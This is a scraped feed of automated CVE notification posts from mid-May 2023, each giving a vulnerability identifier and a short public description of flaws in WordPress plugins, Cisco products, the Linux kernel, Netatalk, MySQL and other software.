🚨 CVE-2020-35933A Reflected Authenticated Cross-Site Scripting (XSS) vulnerability in the Newsletter plugin before 6.8.2 for WordPress allows remote attackers to trick a victim into submitting a tnpc_render AJAX request containing either JavaScript in an options parameter, or a base64-encoded JSON string containing JavaScript in the encoded_options parameter.🎖@cveNotify |
|
| 2023-05-18 17:58:18 |
🚨 CVE-2019-9567The "Forminator Contact Form, Poll & Quiz Builder" plugin before 1.6 for WordPress has XSS via a custom input field of a poll.🎖@cveNotify |
|
| 2023-05-18 17:58:17 |
🚨 CVE-2022-21162Uncontrolled search path for the Intel(R) HDMI Firmware Update tool for NUC before version 1.79.1.1 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-18 17:58:13 |
🚨 CVE-2022-21239Out-of-bounds read in software for the Intel QAT Driver for Windows before version 1.9.0-0008 may allow an authenticated user to potentially enable information disclosure via local access.🎖@cveNotify |
|
| 2023-05-18 17:58:12 |
🚨 CVE-2018-0598Untrusted search path vulnerability in Self-extracting archive files created by IExpress bundled with Microsoft Windows allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.🎖@cveNotify |
|
| 2023-05-18 17:58:11 |
🚨 CVE-2022-45770Improper input validation in adgnetworkwfpdrv.sys in Adguard For Windows x86 through 7.11 allows local privilege escalation.🎖@cveNotify |
|
| 2023-05-18 10:58:21 |
🚨 CVE-2023-2156A flaw was found in the networking subsystem of the Linux kernel within the handling of the RPL protocol. This issue results from the lack of proper handling of user-supplied data, which can lead to an assertion failure. This may allow an unauthenticated remote attacker to create a denial of service condition on the system.🎖@cveNotify |
|
| 2023-05-18 10:58:17 |
🚨 CVE-2023-33203The Linux kernel before 6.2.9 has a race condition and resultant use-after-free in drivers/net/ethernet/qualcomm/emac/emac.c if a physically proximate attacker unplugs an emac based device.🎖@cveNotify |
|
| 2023-05-18 10:58:16 |
🚨 CVE-2023-33204sysstat through 12.7.2 allows a multiplication integer overflow in check_overflow in common.c. NOTE: this issue exists because of an incomplete fix for CVE-2022-39377.🎖@cveNotify |
|
| 2023-05-18 10:58:15 |
🚨 CVE-2023-27233Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php.🎖@cveNotify |
|
| 2023-05-18 10:58:14 |
🚨 CVE-2021-0187Improper access control in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable an escalation of privilege via local access.🎖@cveNotify |
|
| 2023-05-18 06:58:34 |
🚨 CVE-2023-20003A vulnerability in the social login configuration option for the guest users of Cisco Business Wireless Access Points (APs) could allow an unauthenticated, adjacent attacker to bypass social login authentication. This vulnerability is due to a logic error with the social login implementation. An attacker could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the Guest Portal without authentication.🎖@cveNotify |
|
| 2023-05-18 06:58:33 |
🚨 CVE-2023-20160Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:32 |
🚨 CVE-2023-20161Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:30 |
🚨 CVE-2023-20163Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow an authenticated attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit these vulnerabilities, an attacker must have valid credentials on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:29 |
🚨 CVE-2023-20110A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read sensitive data on the underlying database.🎖@cveNotify |
|
| 2023-05-18 06:58:28 |
🚨 CVE-2023-20156Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:27 |
🚨 CVE-2023-20157Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:26 |
🚨 CVE-2023-20158Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:25 |
🚨 CVE-2023-20159Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:24 |
🚨 CVE-2023-20162Multiple vulnerabilities in the web-based user interface of certain Cisco Small Business Series Switches could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with root privileges on an affected device. These vulnerabilities are due to improper validation of requests that are sent to the web interface. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:23 |
🚨 CVE-2023-20164Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow an authenticated attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit these vulnerabilities, an attacker must have valid credentials on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:22 |
🚨 CVE-2023-20166Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow an authenticated attacker to perform path traversal attacks on the underlying operating system to either elevate privileges to root or read arbitrary files. To exploit these vulnerabilities, an attacker must have valid Administrator credentials on the affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:21 |
🚨 CVE-2023-20167Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow an authenticated attacker to perform path traversal attacks on the underlying operating system to either elevate privileges to root or read arbitrary files. To exploit these vulnerabilities, an attacker must have valid Administrator credentials on the affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:20 |
🚨 CVE-2023-20172Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow an authenticated attacker to delete or read arbitrary files on the underlying operating system. To exploit these vulnerabilities, an attacker must have valid credentials on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:19 |
🚨 CVE-2023-20171Multiple vulnerabilities in Cisco Identity Services Engine (ISE) could allow an authenticated attacker to delete or read arbitrary files on the underlying operating system. To exploit these vulnerabilities, an attacker must have valid credentials on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:17 |
🚨 CVE-2023-20173Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to read arbitrary files or conduct a server-side request forgery (SSRF) attack through an affected device. To exploit these vulnerabilities, an attacker must have valid Administrator credentials on the affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:15 |
🚨 CVE-2023-20174Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to read arbitrary files or conduct a server-side request forgery (SSRF) attack through an affected device. To exploit these vulnerabilities, an attacker must have valid Administrator credentials on the affected device. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:14 |
🚨 CVE-2023-20182Multiple vulnerabilities in the API of Cisco DNA Center Software could allow an authenticated, remote attacker to read information from a restricted container, enumerate user information, or execute arbitrary commands in a restricted container as the root user. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:13 |
🚨 CVE-2023-20183Multiple vulnerabilities in the API of Cisco DNA Center Software could allow an authenticated, remote attacker to read information from a restricted container, enumerate user information, or execute arbitrary commands in a restricted container as the root user. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 06:58:12 |
🚨 CVE-2023-20184Multiple vulnerabilities in the API of Cisco DNA Center Software could allow an authenticated, remote attacker to read information from a restricted container, enumerate user information, or execute arbitrary commands in a restricted container as the root user. For more information about these vulnerabilities, see the Details section of this advisory.🎖@cveNotify |
|
| 2023-05-18 00:58:19 |
🚨 CVE-2023-2319It was discovered that an update for PCS package in RHBA-2023:2151 erratum released as part of Red Hat Enterprise Linux 9.2 failed to include the fix for the Webpack issue CVE-2023-28154 (for PCS package), which was previously addressed in Red Hat Enterprise Linux 9.1 via erratum RHSA-2023:1591. The CVE-2023-2319 was assigned to that Red Hat specific security regression in Red Hat Enterprise Linux 9.2.🎖@cveNotify |
|
| 2023-05-18 00:58:15 |
🚨 CVE-2023-27482homeassistant is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered. This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.🎖@cveNotify |
|
| 2023-05-18 00:58:14 |
🚨 CVE-2023-2491A flaw was found in the Emacs text editor. Processing a specially crafted org-mode code with the "org-babel-execute:latex" function in ob-latex.el can result in arbitrary command execution. This CVE exists because of a CVE-2023-28617 security regression for the emacs package in Red Hat Enterprise Linux 8.8 and Red Hat Enterprise Linux 9.2.🎖@cveNotify |
|
| 2023-05-18 00:58:13 |
🚨 CVE-2023-2731A NULL pointer dereference flaw was found in Libtiff's LZWDecode() function in the libtiff/tif_lzw.c file. This flaw allows a local attacker to craft specific input data that can cause the program to dereference a NULL pointer when decompressing a TIFF format file, resulting in a program crash or denial of service.🎖@cveNotify |
|
| 2023-05-17 22:58:39 |
🚨 CVE-2023-32767The web interface of Symcon IP-Symcon before 6.3 (i.e., before 2023-05-12) allows a remote attacker to read sensitive files via .. directory-traversal sequences in the URL.🎖@cveNotify |
|
| 2023-05-17 22:58:38 |
🚨 CVE-2021-46880x509/x509_verify.c in LibreSSL before 3.4.2, and OpenBSD before 7.0 errata 006, allows authentication bypass because an error for an unverified certificate chain is sometimes discarded.🎖@cveNotify |
|
| 2023-05-17 22:58:37 |
🚨 CVE-2023-26463strongSwan 5.9.8 and 5.9.9 potentially allows remote code execution because it uses a variable named "public" for two different purposes within the same function. There is initially incorrect access control, later followed by an expired pointer dereference. One attack vector is sending an untrusted client certificate during EAP-TLS. A server is affected only if it loads plugins that implement TLS-based EAP methods (EAP-TLS, EAP-TTLS, EAP-PEAP, or EAP-TNC). This is fixed in 5.9.10.🎖@cveNotify |
|
| 2023-05-17 22:58:35 |
🚨 CVE-2023-2008A flaw was found in the Linux kernel's udmabuf device driver. The specific flaw exists within a fault handler. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an array. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the kernel.🎖@cveNotify |
|
| 2023-05-17 22:58:34 |
🚨 CVE-2023-29013Traefik (pronounced traffic) is a modern HTTP reverse proxy and load balancer for deploying microservices. There is a vulnerability in Go when parsing the HTTP headers, which impacts Traefik. HTTP header parsing could allocate substantially more memory than required to hold the parsed headers. This behavior could be exploited to cause a denial of service. This issue has been patched in versions 2.9.10 and 2.10.0-rc2.🎖@cveNotify |
|
| 2023-05-17 22:58:33 |
🚨 CVE-2023-29491ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.🎖@cveNotify |
|
| 2023-05-17 22:58:29 |
🚨 CVE-2023-1838A use-after-free flaw was found in vhost_net_set_backend in drivers/vhost/net.c in virtio network subcomponent in the Linux kernel due to a double fget. This flaw could allow a local attacker to crash the system, and could even lead to a kernel information leak problem.🎖@cveNotify |
|
| 2023-05-17 22:58:28 |
🚨 CVE-2023-28464hci_conn_cleanup in net/bluetooth/hci_conn.c in the Linux kernel through 6.2.9 has a use-after-free (observed in hci_conn_hash_flush) because of calls to hci_dev_put and hci_conn_put. There is a double free that may lead to privilege escalation.🎖@cveNotify |
|
| 2023-05-17 22:58:27 |
🚨 CVE-2023-0664A flaw was found in the QEMU Guest Agent service for Windows. A local unprivileged user may be able to manipulate the QEMU Guest Agent's Windows installer via repair custom actions to elevate their privileges on the system.🎖@cveNotify |
|
| 2023-05-17 22:58:26 |
🚨 CVE-2023-0210A bug affects the Linux kernel’s ksmbd NTLMv2 authentication and is known to crash the OS immediately in Linux-based systems.🎖@cveNotify |
|
| 2023-05-17 22:58:25 |
🚨 CVE-2023-0568In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, core path resolution function allocate buffer one byte too small. When resolving paths with lengths close to system MAXPATHLEN setting, this may lead to the byte after the allocated buffer being overwritten with NUL value, which might lead to unauthorized data access or modification. 🎖@cveNotify |
|
| 2023-05-17 21:58:14 |
🚨 CVE-2023-20046A vulnerability in the key-based SSH authentication feature of Cisco StarOS Software could allow an authenticated, remote attacker to elevate privileges on an affected device. This vulnerability is due to insufficient validation of user-supplied credentials. An attacker could exploit this vulnerability by sending a valid low-privileged SSH key to an affected device from a host that has an IP address that is configured as the source for a high-privileged user account. A successful exploit could allow the attacker to log in to the affected device through SSH as a high-privileged user. There are workarounds that address this vulnerability.🎖@cveNotify |
|
| 2023-05-17 21:58:13 |
🚨 CVE-2023-31148An Improper Input Validation vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interface could allow a remote authenticated attacker to execute arbitrary code.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-17 21:58:12 |
🚨 CVE-2023-31151An Improper Certificate Validation vulnerability in the Schweitzer Engineering Laboratories Real-Time Automation Controller (SEL RTAC) Web Interfacecould allow a remote unauthenticated attacker to conduct a man-in-the-middle (MitM) attack.See SEL Service Bulletin dated 2022-11-15 for more details.🎖@cveNotify |
|
| 2023-05-17 18:58:41 |
🚨 CVE-2023-2745WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack.🎖@cveNotify |
|
| 2023-05-17 18:58:40 |
🚨 CVE-2022-22026Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:39 |
🚨 CVE-2022-22028Windows Network File System Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:35 |
🚨 CVE-2022-22029Windows Network File System Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:34 |
🚨 CVE-2022-22034Windows Graphics Component Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:33 |
🚨 CVE-2022-22036Performance Counters for Windows Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:29 |
🚨 CVE-2022-22037Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:28 |
🚨 CVE-2022-22038Remote Procedure Call Runtime Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:27 |
🚨 CVE-2022-22048BitLocker Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:24 |
🚨 CVE-2022-22039Windows Network File System Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:23 |
🚨 CVE-2022-22040Internet Information Services Dynamic Compression Module Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-05-17 18:58:22 |
🚨 CVE-2022-22042Windows Hyper-V Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-05-17 16:58:35 |
🚨 CVE-2023-2618A vulnerability, which was classified as problematic, has been found in OpenCV wechat_qrcode Module up to 4.7.0. Affected by this issue is the function DecodedBitStreamParser::decodeHanziSegment of the file qrcode/decoder/decoded_bit_stream_parser.cpp. The manipulation leads to memory leak. The attack may be launched remotely. The name of the patch is 2b62ff6181163eea029ed1cab11363b4996e9cd6. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-228548.🎖@cveNotify |
|
| 2023-05-17 16:58:33 |
🚨 CVE-2023-2617A vulnerability classified as problematic was found in OpenCV wechat_qrcode Module up to 4.7.0. Affected by this vulnerability is the function DecodedBitStreamParser::decodeByteSegment of the file qrcode/decoder/decoded_bit_stream_parser.cpp. The manipulation leads to null pointer dereference. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-228547.🎖@cveNotify |
|
| 2023-05-17 16:58:32 |
🚨 CVE-2023-22441Missing authentication for critical function exists in Seiko Solutions SkyBridge series, which may allow a remote attacker to obtain or alter the setting information of the product or execute some critical functions without authentication, e.g., rebooting the product. Affected products and versions are as follows: SkyBridge MB-A200 firmware Ver. 01.00.05 and earlier, and SkyBridge BASIC MB-A130 firmware Ver. 1.4.1 and earlier🎖@cveNotify |
|
| 2023-05-17 16:58:31 |
🚨 CVE-2023-31723yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function expand_mmac_params at /nasm/nasm-pp.c.🎖@cveNotify |
|
| 2023-05-17 16:58:29 |
🚨 CVE-2023-31724yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the function do_directive at /nasm/nasm-pp.c.🎖@cveNotify |
|
| 2023-05-17 16:58:28 |
🚨 CVE-2023-31725yasm 1.3.0.55.g101bc was discovered to contain a heap-use-after-free via the function expand_mmac_params at yasm/modules/preprocs/nasm/nasm-pp.c.🎖@cveNotify |
|
| 2023-05-17 16:58:26 |
🚨 CVE-2023-30860WWBN AVideo is an open source video platform. In AVideo prior to version 12.4, a normal user can make a Meeting Schedule where the user can invite another user in that Meeting, but it does not properly sanitize the malicious characters when creating a Meeting Room. This allows attacker to insert malicious scripts. Since any USER including the ADMIN can see the meeting room that was created by the attacker this can lead to cookie hijacking and takeover of any accounts. Version 12.4 contains a patch for this issue.🎖@cveNotify |
|
| 2023-05-17 16:58:25 |
🚨 CVE-2023-30837Vyper is a pythonic smart contract language for the EVM. The storage allocator does not guard against allocation overflows in versions prior to 0.3.8. An attacker can overwrite the owner variable. This issue was fixed in version 0.3.8.🎖@cveNotify |
|
| 2023-05-17 16:58:23 |
🚨 CVE-2023-28316A security vulnerability has been discovered in the implementation of 2FA on the rocket.chat platform, where other active sessions are not invalidated upon activating 2FA. This could potentially allow an attacker to maintain access to a compromised account even after 2FA is enabled.🎖@cveNotify |
|
| 2023-05-17 16:58:22 |
🚨 CVE-2023-27973Certain HP LaserJet Pro print products are potentially vulnerable to Heap Overflow and/or Remote Code Execution.🎖@cveNotify |
|
| 2023-05-17 16:58:21 |
🚨 CVE-2022-4008In affected versions of Octopus Deploy it is possible to upload a zipbomb file as a task which results in Denial of Service🎖@cveNotify |
|
| 2023-05-17 16:58:19 |
🚨 CVE-2021-31711Cross Site Scripting vulnerability found in Trippo ResponsiveFilemanager v.9.14.0 and before allows a remote attacker to execute arbitrary code via the sort_by parameter in the dialog.php file.🎖@cveNotify |
|
| 2023-05-17 16:58:18 |
🚨 CVE-2023-31700TP-Link TL-WPA4530 KIT V2 (EU)_170406 and V2 (EU)_161115 is vulnerable to Command Injection via _httpRpmPlcDeviceAdd.🎖@cveNotify |
|
| 2023-05-17 16:58:17 |
🚨 CVE-2023-31701TP-Link TL-WPA4530 KIT V2 (EU)_170406 and V2 (EU)_161115 is vulnerable to Command Injection via _httpRpmPlcDeviceRemove.🎖@cveNotify |
|
| 2023-05-17 16:58:15 |
🚨 CVE-2023-31722There exists a heap buffer overflow in nasm 2.16.02rc1 (GitHub commit: b952891).🎖@cveNotify |
|
| 2023-05-17 14:58:22 |
🚨 CVE-2023-27889Cross-site request forgery (CSRF) vulnerability in LIQUID SPEECH BALLOON versions prior to 1.2 allows a remote unauthenticated attacker to hijack the authentication of a user and to perform unintended operations by having a user view a malicious page.🎖@cveNotify |
|
| 2023-05-17 14:58:21 |
🚨 CVE-2023-2662In Xpdf 4.04 (and earlier), a bad color space object in the input PDF file can cause a divide-by-zero.🎖@cveNotify |
|
| 2023-05-17 14:58:19 |
🚨 CVE-2023-29273Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-17 14:58:18 |
🚨 CVE-2023-29274Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-17 14:58:17 |
🚨 CVE-2023-29275Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-17 14:58:15 |
🚨 CVE-2023-29276Adobe Substance 3D Painter versions 8.3.0 (and earlier) is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-05-17 05:58:38 |
🚨 CVE-2022-23122This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the setfilparams function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15837.🎖@cveNotify |
|
| 2023-05-17 05:58:37 |
🚨 CVE-2022-23123This vulnerability allows remote attackers to disclose sensitive information on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the getdirparams method. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-15830.🎖@cveNotify |
|
| 2023-05-17 05:58:36 |
🚨 CVE-2022-23124This vulnerability allows remote attackers to disclose sensitive information on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the get_finderinfo method. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-15870.🎖@cveNotify |
|
| 2023-05-17 05:58:35 |
🚨 CVE-2022-23125This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the copyapplfile function. When parsing the len element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15869.🎖@cveNotify |
|
| 2023-05-17 05:58:34 |
🚨 CVE-2022-45188Netatalk through 3.1.13 has an afp_getappl heap-based buffer overflow resulting in code execution via a crafted .appl file. This provides remote root access on some platforms such as FreeBSD (used for TrueNAS).🎖@cveNotify |
|
| 2023-05-17 05:58:30 |
🚨 CVE-2021-31439This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Synology DiskStation Manager. Authentication is not required to exploit this vulnerablity. The specific flaw exists within the processing of DSI structures in Netatalk. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-12326.🎖@cveNotify |
|
| 2023-05-17 05:58:29 |
🚨 CVE-2023-2664 In Xpdf 4.04 (and earlier), a PDF object loop in the embedded file tree leads to infinite recursion and a stack overflow.🎖@cveNotify |
|
| 2023-05-17 05:58:28 |
🚨 CVE-2023-31472An issue was discovered on GL.iNet devices before 3.216. There is an arbitrary file write in which an empty file can be created anywhere on the filesystem. This is caused by a command injection vulnerability with a filter applied.🎖@cveNotify |
|
| 2023-05-17 05:58:27 |
🚨 CVE-2023-25394Videostream macOS app 0.5.0 and 0.4.3 has a Race Condition. The Updater privileged script attempts to update Videostream every 5 hours.🎖@cveNotify |
|
| 2023-05-17 05:58:23 |
🚨 CVE-2023-2528The Contact Form by Supsystic plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.7.24. This is due to missing or incorrect nonce validation on the AJAX action handler. This makes it possible for unauthenticated attackers to execute AJAX actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-05-17 05:58:22 |
🚨 CVE-2023-31848davinci 0.3.0-rc is vulnerable to Server-side request forgery (SSRF).🎖@cveNotify |
|
| 2023-05-17 05:58:21 |
🚨 CVE-2023-31907Jerryscript 3.0.0 was discovered to contain a heap-buffer-overflow via the component scanner_literal_is_created at /jerry-core/parser/js/js-scanner-util.c.🎖@cveNotify |
|
| 2023-05-17 05:58:20 |
🚨 CVE-2023-31906Jerryscript 3.0.0(commit 1a2c047) was discovered to contain a heap-buffer-overflow via the component lexer_compare_identifier_to_chars at /jerry-core/parser/js/js-lexer.c.🎖@cveNotify |
|
| 2023-05-17 05:58:16 |
🚨 CVE-2020-14678Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-05-17 05:58:15 |
🚨 CVE-2020-14680Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-17 05:58:14 |
🚨 CVE-2020-14702Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-17 05:58:13 |
🚨 CVE-2020-14575Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.20 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-05-16 23:58:40 |
🚨 CVE-2023-31544A stored cross-site scripting (XSS) vulnerability in alkacon-OpenCMS v11.0.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field under the Upload Image module.🎖@cveNotify |
|
| 2023-05-16 23:58:38 |
🚨 CVE-2023-22361Improper privilege management vulnerability in SkyBridge MB-A100/110 firmware Ver. 4.2.0 and earlier allows a remote authenticated attacker to alter a WebUI password of the product.🎖@cveNotify |
|
| 2023-05-16 23:58:36 |
